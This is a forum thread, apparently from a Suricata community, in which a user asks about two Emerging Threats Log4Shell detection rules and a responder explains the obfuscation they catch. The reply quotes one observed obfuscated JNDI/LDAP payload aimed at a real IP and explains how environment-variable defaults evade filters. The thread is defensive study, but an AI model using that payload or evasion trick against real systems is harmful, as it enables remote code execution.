Need help understanding the meaning of the content and/or pcre of these two SID rules?

TheSuricataBro · May 24, 2024, 3:24am

alert tcp any any → [$HOME_NET,$HTTP_SERVERS] any (msg:“ET EXPLOIT Apache Obfuscated log4j RCE Attempt (tcp ldap) (CVE-2021-44228)”; flow:established,to_server; content:“|24 7b 24 7b|env|3a|NaN|3a|-j|7d|ndi|24 7b|env|3a|NaN|3a|”; nocase; fast_pattern; content:“|24 7b|env|3a|NaN|3a|-l|7d|dap|24|”; reference:url,x.com; reference:cve,2021-44228; classtype:attempted-admin; sid:2034755; rev:1; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, former_category EXPLOIT, signature_severity Major, updated_at 2021_12_17;)

alert udp any any → [$HOME_NET,$HTTP_SERVERS] any (msg:“ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M1 (CVE-2021-44228)”; content:“%7bjndi%3a”; nocase; fast_pattern; pcre:“/^(l|r|d|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(l|r|d)(\x7d|%7d))(d|n|m|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(d|n|m)(\x7d|%7d))(a|i|s|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(a|i|s)(\x7d|%7d))(p|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)p(\x7d|%7d))/Ri”; reference:cve,2021-44228; classtype:attempted-admin; sid:2034660; rev:3; metadata:attack_target Server, created_at 2021_12_11, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)

So for the first alert, I can use a hex converter to decipher what 24, 7b, 3a, are supposed to map to. Roughly, this should be the beginning of a JNDI lookup. But when it comes to “NaN” or “ndi” I am totally puzzled, as well as what “env” is supposed to be (I’m assuming it’s an environmental variable). My guess is that as this is obfusfaction, the payload is being packed into multiple curly brackets. Feel free to correct me.
For the second alert, what is the purpose behind using the % in the content and the pcre, and how %24 may differ from x24? That I’m confused about. In addition, what are character sequences like “l|r|d|” or “a|i|s” looking for? Is it just a mere requirement of the regular expression that some of the strings have one of these letters at those positions?

bmurphy · May 24, 2024, 2:51pm

Hey there!

My guess is that as this is obfusfaction, the payload is being packed into multiple curly brackets

You are correct, this rule is addressing a method of obfuscation observed within the log4shell attempts.

I think this section of the documentation around ET’s log4shell response produces some basic information and useful links for you to to read up on some of the obfuscation techniques.

Specific to your questions

But when it comes to “NaN” or “ndi” I am totally puzzled, as well as what “env” is supposed to be (I’m assuming it’s an environmental variable).

I think it works best if you look at the string reported within the rule’s reference (on x.com)

This was the observed string as per the reference x.com

${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//81.30.157.43:1389/Basic/Command/Base64/[encoded]

Keep in mind that an application vulnerable to log4shell will actually execute these commands, so lets look at a single character’s obfuscation technique ${env:NaN:-j}

This will attempt to populate the value of the environmental variable called “NaN” and if that doesn’t exist, will default to j - thus when combined with the rest of the string {${env:NaN:-j}ndi becomes jndi

NaN is very likely to be undeclared, so this is a very simple obfuscation attempt to bypass protective controls.

what is the purpose behind using the % in the content and the pcre, and how %24 may differ from x24?

in this case (\x24|%24) the PCRE is establishing an “OR” been two different forms of the same character (a $ in this case). When a $ is URL encoded, it MAY appear as %24. URL encoding is a common form of obfuscation. In thise case, the URL encoded and non-encoded form of the $ is match. the \x within the PCRE tells the PCRE engine that the next chars are hex encoded, so the engine will decode the hex and match that literal character. Is is required here because $ is also a metacharacter. within PCRE, meant to indicate the “end of a line”. As such, escaping it via hex encoding tells the PCRE engine to use the literal character.

Also, for anything ET related, including rule explanations of ET created rules (such as these) or to report FPs, etc feel free to post over on our discourse (community.emergingthreats.net)

TheSuricataBro · May 24, 2024, 6:21pm

Thank you so much for the explanation! This was very helpful, and thanks for the link to the emerging threats community, I will frequent that space if I have any questions about the explanations of the ET rules.

Topic		Replies	Views
Packet logging enabled, 2 hits and more then a million packets logged Rules rules , suricata	2	269	February 29, 2024
Fast.log entry/entries Help ips	3	938	February 17, 2021
Content:!"" appear to not be working inside of rule "ET POLICY SMB2 NT Create AndX Request For a DLL File - Possible Lateral Movement""	5	215	October 1, 2024
What is the purpose of Suricata rules which have sid 2200000-2299999? Rules rules , suricata	4	109	August 7, 2024
Understanding packets and log records Rules suricata	0	427	January 3, 2023

Need help understanding the meaning of the content and/or pcre of these two SID rules?

Related topics